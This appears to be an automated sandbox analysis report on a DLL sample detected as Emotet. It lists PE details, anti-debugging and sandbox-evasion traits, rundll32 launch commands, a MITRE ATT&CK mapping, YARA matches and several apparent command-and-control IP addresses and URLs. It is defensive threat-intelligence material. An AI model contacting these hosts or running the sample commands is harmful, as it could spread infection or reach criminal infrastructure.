Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: pYebrdRKvR.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: pYebrdRKvR.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: pYebrdRKvR.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: pYebrdRKvR.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: pYebrdRKvR.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: pYebrdRKvR.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: pYebrdRKvR.dll

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source: pYebrdRKvR.dll

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source: pYebrdRKvR.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: pYebrdRKvR.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: pYebrdRKvR.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: pYebrdRKvR.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: pYebrdRKvR.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6F32C7C9 push esi; retf	3_2_6F32C7D0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6F32BAD4 push ebx; iretd	3_2_6F32BADE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6F32AD03 push esi; iretd	3_2_6F32AD14
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6F32CDEB push esp; ret	3_2_6F32CDEC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6F325DD9 push eax; ret	3_2_6F325DE2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6F33D066 push ecx; ret	3_2_6F33D079
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6F329C81 push eax; retf	3_2_6F329C83
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6F32C7C9 push esi; retf	4_2_6F32C7D0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6F32BAD4 push ebx; iretd	4_2_6F32BADE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6F32AD03 push esi; iretd	4_2_6F32AD14
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6F32CDEB push esp; ret	4_2_6F32CDEC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6F325DD9 push eax; ret	4_2_6F325DE2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6F33D066 push ecx; ret	4_2_6F33D079
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6F329C81 push eax; retf	4_2_6F329C83
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_10001229 push eax; retf	4_2_1000129A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_10001229 push eax; retf	5_2_1000129A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_10001229 push eax; retf	6_2_1000129A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10001229 push eax; retf	7_2_1000129A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_10001229 push eax; retf	8_2_1000129A

Source: pYebrdRKvR.dll

Static PE information: section name: .flat

Source: pYebrdRKvR.dll

Static PE information: real checksum: 0x748e8 should be: 0x77647

Source: C:\Windows\SysWOW64\rundll32.exe

PE file moved: C:\Windows\SysWOW64\Olcnhkjrspgysi\kpevmak.bsr

Jump to behavior

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)

Show sources

Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Olcnhkjrspgysi\kpevmak.bsr:Zone.Identifier read attributes \| delete			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Ydpdeu\qpxyk.kbo:Zone.Identifier read attributes \| delete			Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\System32\svchost.exe TID: 6436	Thread sleep time: -120000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 6716	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 5200	Thread sleep time: -30000s >= -30000s	Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Last function: Thread delayed

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6F34188A FindFirstFileExW,	3_2_6F34188A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6F34188A FindFirstFileExW,	4_2_6F34188A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_10011A80 FindFirstFileW,	8_2_10011A80

Source: C:\Windows\SysWOW64\rundll32.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: svchost.exe, 00000011.00000002.508880913.0000018F112F4000.00000004.00000001.sdmp, svchost.exe, 00000014.00000002.864233004.000001AB1485E000.00000004.00000001.sdmp	Binary or memory string: "@Hyper-V RAW
Source: rundll32.exe, 00000008.00000002.882777684.0000000000D12000.00000004.00000001.sdmp, rundll32.exe, 00000008.00000003.615469269.0000000000D12000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW[
Source: svchost.exe, 00000011.00000002.508736720.0000018F11270000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW`s/
Source: rundll32.exe, 00000008.00000002.882777684.0000000000D12000.00000004.00000001.sdmp, rundll32.exe, 00000008.00000003.615469269.0000000000D12000.00000004.00000001.sdmp, svchost.exe, 00000011.00000002.508849113.0000018F112E5000.00000004.00000001.sdmp, svchost.exe, 00000014.00000002.864210945.000001AB14849000.00000004.00000001.sdmp, svchost.exe, 00000014.00000002.863874848.000001AB0F22A000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW
Source: rundll32.exe, 00000008.00000002.882777684.0000000000D12000.00000004.00000001.sdmp, rundll32.exe, 00000008.00000003.615469269.0000000000D12000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAWxI

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 3_2_6F33FF39 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

3_2_6F33FF39

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 3_2_6F33BB30 GetNativeSystemInfo,VirtualAlloc,VirtualAlloc,VirtualAlloc,GetProcessHeap,HeapAlloc,VirtualFree,VirtualAlloc,SetLastError,HeapFree,SetLastError,

3_2_6F33BB30

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6F33F416 mov eax, dword ptr fs:[00000030h]	3_2_6F33F416
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6F3414AE mov eax, dword ptr fs:[00000030h]	3_2_6F3414AE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6F33F416 mov eax, dword ptr fs:[00000030h]	4_2_6F33F416
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6F3414AE mov eax, dword ptr fs:[00000030h]	4_2_6F3414AE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_1001DE10 mov eax, dword ptr fs:[00000030h]	4_2_1001DE10
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_1001DE10 mov eax, dword ptr fs:[00000030h]	5_2_1001DE10
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_1001DE10 mov eax, dword ptr fs:[00000030h]	6_2_1001DE10
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1001DE10 mov eax, dword ptr fs:[00000030h]	7_2_1001DE10
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_1001DE10 mov eax, dword ptr fs:[00000030h]	8_2_1001DE10

Source: C:\Windows\System32\loaddll32.exe

Process queried: DebugPort

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6F33FF39 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_6F33FF39
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6F33C66F SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_2_6F33C66F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6F33CEA2 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_6F33CEA2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6F33FF39 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	4_2_6F33FF39
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6F33C66F SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	4_2_6F33C66F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6F33CEA2 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	4_2_6F33CEA2

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 196.44.98.190 144	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 45.79.33.48 144	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 168.197.250.14 80	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 51.178.61.60 187	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 177.72.80.14 168	Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\pYebrdRKvR.dll",#1			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\pYebrdRKvR.dll,Control_RunDLL			Jump to behavior

Source: rundll32.exe, 00000008.00000002.885866001.0000000003180000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: rundll32.exe, 00000008.00000002.885866001.0000000003180000.00000002.00020000.sdmp	Binary or memory string: Progman
Source: rundll32.exe, 00000008.00000002.885866001.0000000003180000.00000002.00020000.sdmp	Binary or memory string: &Program Manager
Source: rundll32.exe, 00000008.00000002.885866001.0000000003180000.00000002.00020000.sdmp	Binary or memory string: Progmanlock

Source: C:\Windows\SysWOW64\rundll32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 3_2_6F33D07B cpuid

3_2_6F33D07B

Source: C:\Windows\SysWOW64\rundll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 3_2_6F33CAD3 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

3_2_6F33CAD3

Stealing of Sensitive Information:

Yara detected Emotet

Show sources

Source: Yara match	File source: 6.2.rundll32.exe.a46e78.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.d16c20.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.a76c68.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.rundll32.exe.a76c68.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.a76c68.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.3696cf0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.3516cc0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.rundll32.exe.a76c68.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.3516cc0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.3.rundll32.exe.a46e78.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.d16c20.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rundll32.exe.a46e78.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.3696cf0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.3.rundll32.exe.d16c20.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000003.360524597.0000000000A76000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.361688769.0000000000A46000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.367502574.0000000003696000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.882777684.0000000000D12000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.364197169.0000000000A3A000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.615469269.0000000000D12000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.362028571.0000000003516000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.362088501.0000000000A46000.00000004.00000020.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation	Path Interception	Process Injection112	Masquerading2	OS Credential Dumping	System Time Discovery1	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel11	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Virtualization/Sandbox Evasion3	LSASS Memory	Query Registry1	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Non-Standard Port1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Process Injection112	Security Account Manager	Security Software Discovery41	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Ingress Tool Transfer4	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Deobfuscate/Decode Files or Information1	NTDS	Virtualization/Sandbox Evasion3	Distributed Component Object Model	Input Capture	Scheduled Transfer	Non-Application Layer Protocol2	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Hidden Files and Directories1	LSA Secrets	Process Discovery2	SSH	Keylogging	Data Transfer Size Limits	Application Layer Protocol13	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Obfuscated Files or Information2	Cached Domain Credentials	Remote System Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Rundll321	DCSync	File and Directory Discovery2	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	File Deletion1	Proc Filesystem	System Information Discovery34	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
pYebrdRKvR.dll	18%	Virustotal		Browse
pYebrdRKvR.dll	18%	ReversingLabs	Win32.Trojan.Mansabo
pYebrdRKvR.dll	100%	Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Download
4.2.rundll32.exe.10000000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
5.2.rundll32.exe.10000000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
8.2.rundll32.exe.10000000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
7.2.rundll32.exe.10000000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
6.2.rundll32.exe.10000000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
https://www.disneyplus.com/legal/your-california-privacy-rights	0%	URL Reputation	safe
https://51.178.61.60/wxXNBTtFVptEPyBMyhxzytUrLNSymmMWHdjZgweBcTxtKLUZGczVLXNxnireROs	0%	Avira URL Cloud	safe
https://177.72.80.14/akR=	0%	Avira URL Cloud	safe
https://168.197.250.14:80/qeEsRQYaDgRwXDJjRsnTiXgQ~Y	0%	Avira URL Cloud	safe
https://177.72.80.14:7080/VoY	0%	Avira URL Cloud	safe
https://168.197.250.14:80/qeEsRQYaDgRwXDJjRsnTiXgQlY	0%	Avira URL Cloud	safe
http://crl.ver)	0%	Avira URL Cloud	safe
https://www.tiktok.com/legal/report/feedback	0%	URL Reputation	safe
https://196.44.98.190/	0%	Avira URL Cloud	safe
https://196.44.98.190/)k	0%	Avira URL Cloud	safe
https://177.72.80.14/	0%	Avira URL Cloud	safe
https://196.44.98.190:8080/cRBQvElvVswAKMbGJRCeWFEoAKWVURRoDepPZnuTejOhPOKJ	0%	Avira URL Cloud	safe
https://177.72.80.14:7080/kp	0%	Avira URL Cloud	safe
https://51.178.61.60/wxXNBTtFVptEPyBMyhxzytUrLNSymmMWHdjZgweBcTxtKLUZGczVLXNxnireROs5	0%	Avira URL Cloud	safe
https://177.72.80.14:7080/k	0%	Avira URL Cloud	safe
https://168.197.250.14/lhQ	0%	Avira URL Cloud	safe
https://www.disneyplus.com/legal/privacy-policy	0%	URL Reputation	safe
https://196.44.98.190:8080/	0%	Avira URL Cloud	safe
https://51.178.61.60/	0%	Avira URL Cloud	safe
https://177.72.80.14:7080/	0%	Avira URL Cloud	safe
https://168.197.250.14/khX	0%	Avira URL Cloud	safe
https://45.79.33.48/	0%	Avira URL Cloud	safe
https://51.178.61.60/rLNSymmMWHdjZgweBcTxtKLUZGczVLXNxnireROs	0%	Avira URL Cloud	safe
https://45.79.33.48:8080/GEGDSODavaAMfbQXuktdlcgqQGPldhWooFcQtRsikthZVdhkisiiQD	0%	Avira URL Cloud	safe
https://disneyplus.com/legal.	0%	URL Reputation	safe
https://177.72.80.14:7080/kst	0%	Avira URL Cloud	safe
http://www.microsoft.c	0%	URL Reputation	safe
http://help.disneyplus.com.	0%	URL Reputation	safe
https://168.197.250.14:80/	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

No contacted domains info

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://51.178.61.60/wxXNBTtFVptEPyBMyhxzytUrLNSymmMWHdjZgweBcTxtKLUZGczVLXNxnireROs	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://www.disneyplus.com/legal/your-california-privacy-rights	svchost.exe, 00000011.00000003.488879650.0000018F11B91000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.488742687.0000018F11B6F000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
https://177.72.80.14/akR=	rundll32.exe, 00000008.00000002.885044088.0000000000D6B000.00000004.00000001.sdmp, rundll32.exe, 00000008.00000003.615433504.0000000000D6B000.00000004.00000001.sdmp, rundll32.exe, 00000008.00000003.478842500.0000000000DA3000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://168.197.250.14:80/qeEsRQYaDgRwXDJjRsnTiXgQ~Y	rundll32.exe, 00000008.00000002.882777684.0000000000D12000.00000004.00000001.sdmp, rundll32.exe, 00000008.00000003.615469269.0000000000D12000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://177.72.80.14:7080/VoY	rundll32.exe, 00000008.00000003.478842500.0000000000DA3000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://168.197.250.14:80/qeEsRQYaDgRwXDJjRsnTiXgQlY	rundll32.exe, 00000008.00000002.882777684.0000000000D12000.00000004.00000001.sdmp, rundll32.exe, 00000008.00000003.615469269.0000000000D12000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.ver)	svchost.exe, 00000014.00000002.864253406.000001AB1488A000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	low
https://www.tiktok.com/legal/report/feedback	svchost.exe, 00000011.00000003.489823418.0000018F11BB4000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.489811039.0000018F11B8C000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.489888481.0000018F11B9D000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.489902032.0000018F12002000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.489840536.0000018F11BB4000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
https://196.44.98.190/	rundll32.exe, 00000008.00000002.885044088.0000000000D6B000.00000004.00000001.sdmp, rundll32.exe, 00000008.00000003.615433504.0000000000D6B000.00000004.00000001.sdmp, rundll32.exe, 00000008.00000003.478842500.0000000000DA3000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://196.44.98.190/)k	rundll32.exe, 00000008.00000002.885044088.0000000000D6B000.00000004.00000001.sdmp, rundll32.exe, 00000008.00000003.615433504.0000000000D6B000.00000004.00000001.sdmp, rundll32.exe, 00000008.00000003.478842500.0000000000DA3000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://177.72.80.14/	rundll32.exe, 00000008.00000002.885044088.0000000000D6B000.00000004.00000001.sdmp, rundll32.exe, 00000008.00000003.615433504.0000000000D6B000.00000004.00000001.sdmp, rundll32.exe, 00000008.00000003.478842500.0000000000DA3000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://196.44.98.190:8080/cRBQvElvVswAKMbGJRCeWFEoAKWVURRoDepPZnuTejOhPOKJ	rundll32.exe, 00000008.00000002.885044088.0000000000D6B000.00000004.00000001.sdmp, rundll32.exe, 00000008.00000002.882539966.0000000000CD0000.00000004.00000020.sdmp, rundll32.exe, 00000008.00000003.615433504.0000000000D6B000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://177.72.80.14:7080/kp	rundll32.exe, 00000008.00000002.885044088.0000000000D6B000.00000004.00000001.sdmp, rundll32.exe, 00000008.00000003.615433504.0000000000D6B000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://51.178.61.60/wxXNBTtFVptEPyBMyhxzytUrLNSymmMWHdjZgweBcTxtKLUZGczVLXNxnireROs5	rundll32.exe, 00000008.00000002.882575499.0000000000CDA000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
https://177.72.80.14:7080/k	rundll32.exe, 00000008.00000002.885044088.0000000000D6B000.00000004.00000001.sdmp, rundll32.exe, 00000008.00000003.615433504.0000000000D6B000.00000004.00000001.sdmp, rundll32.exe, 00000008.00000003.478842500.0000000000DA3000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://168.197.250.14/lhQ	rundll32.exe, 00000008.00000002.885044088.0000000000D6B000.00000004.00000001.sdmp, rundll32.exe, 00000008.00000003.615433504.0000000000D6B000.00000004.00000001.sdmp, rundll32.exe, 00000008.00000003.478842500.0000000000DA3000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://www.disneyplus.com/legal/privacy-policy	svchost.exe, 00000011.00000003.488879650.0000018F11B91000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.488742687.0000018F11B6F000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
https://196.44.98.190:8080/	rundll32.exe, 00000008.00000003.478842500.0000000000DA3000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://51.178.61.60/	rundll32.exe, 00000008.00000002.882777684.0000000000D12000.00000004.00000001.sdmp, rundll32.exe, 00000008.00000003.615469269.0000000000D12000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://177.72.80.14:7080/	rundll32.exe, 00000008.00000003.478842500.0000000000DA3000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://168.197.250.14/khX	rundll32.exe, 00000008.00000002.885044088.0000000000D6B000.00000004.00000001.sdmp, rundll32.exe, 00000008.00000003.615433504.0000000000D6B000.00000004.00000001.sdmp, rundll32.exe, 00000008.00000003.478842500.0000000000DA3000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
